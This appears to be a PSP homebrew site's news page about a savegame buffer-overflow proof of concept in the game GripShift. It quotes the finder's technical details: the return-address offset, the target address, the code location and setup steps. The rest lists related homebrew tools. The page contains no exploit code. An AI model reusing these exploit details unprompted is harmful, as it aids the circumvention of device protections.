Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: buffer overflow!) in the three year old game, GripShift.
MaTiAz says that they've yet to find any further use for this, but it's still a new exploit. It could lead to further hacks, and for now, it's merely a proof of concept. Be that as it may, this is a great start, and a rather sweet find! Here's MaTiAz explaining the exploit:
"GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running ). The return address is located at offset 0xA9 in the file. In this poc it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file."
"It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him, if the program didn't exist I wouldn't have bothered with this. ). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh."
Like it? Share with your friends!
If you got an error while installing Themes, Software or Games, please, read FAQ.
Similar Software:
X-Flash X-Flash
Art from our forums has once again released an updated version of his wonder firmware modification program, X-Flash. A few days ago, it was in version 18c and now, he just unleashed version 18d. Just like the earlier release, this one also has Multiple Firmware Support
PSP Grader PSP Grader
Requirements
A PSP with MemoryStick or MicroSD Card.
Windows 2000, XP, Vista, 7, or Newer.
DOES NOT need .net!
Features
- Download the eboot straight from the app!
- Load eboots stored in ZIP files
PSP-HUD PSP-HUD
Homebrew developer darko79 has released the first version of PSP-HUD, a plugin for the PSP that allows you to display your unit's info on either the left or right bottom corner of your screen. The plugin can be easily configured via the note button.
The plugin displays basic info such as CPU speed, remaining battery power and the current time
DevHook 0.52 Installer with FW 3.03 DevHook 0.52 Installer with FW 3.03
As we have been saying from the get-go, one of the things you'll appreciate about the PSP homebrew scene is that every dev - be it a novice, an expert, or a journeyman is willing to lend a helping hand to those who are still a bit uncomfortable about installing certain PSP applications
Psp_Time_Controller 0.1 Hello everyone!A la demande de RLR, membre, j'ai realiser un plugin base sur la minuterie d'arret differee de Sony, mais qui est plus performante et qui fonctionne n'importe ou dans le XMB
Live Update Homebrew Installer Live Update Homebrew Installer
PSP Italy provides all Italians and Italian-understanding
people downloads for PSP
Eb0x Eb0x
Developer bumuckl was recently able to come up with a neat homebrew application which allows you to extract some of the visual contents of an EBOOT.PBP file and dump them into your PlayStation Portable.
While there have been previously released programs with similar functions, Eb0x directly extracts any thumbnails and preview images from the EBOOT
Custom Firmware 3.51 M33-4 Custom Firmware 3.51 M33-4
QJ.NET PSP Development Forum mainstay blackbird 0001 just informed us that Team M33 just came up with a new update for its custom firmware bringing it up to 3.51 M33-4. Take note that this is different from the recent CFW addon provided by coder Test30
X-Flash X-Flash
Art, through our forums, has once again updated his homebrew application, X-Flash. Yup, that first sentence has become a template here at QJ because the dev never ceases to amaze us with his dedication when it comes to his creations. Just a few days ago (two days to be really exact), he has unleashed X-Flash v16d and now here we are writing about v16f
PSP Custom Firmware 1.62 IE-D PSP Custom Firmware 1.62 IE-D
A few short days after creating Custom Firmware 1.62 IE-C Update 3 for our usage, PSP homebrew coder becus25 once again dropped by the QJ.Net Forums to announce the release of Custom Firmware 1.62 IE-D. Minor bug fixes aside, version "D" also carries several new features:
* In software system puts "version 1.62 IE-D"
Comments on GripShift savegame exploit POC:
Comments not found
If you noted an error or download link is broken, please, report it via this page or use comments.
Please, select device to check if GripShift savegame exploit POC supports it
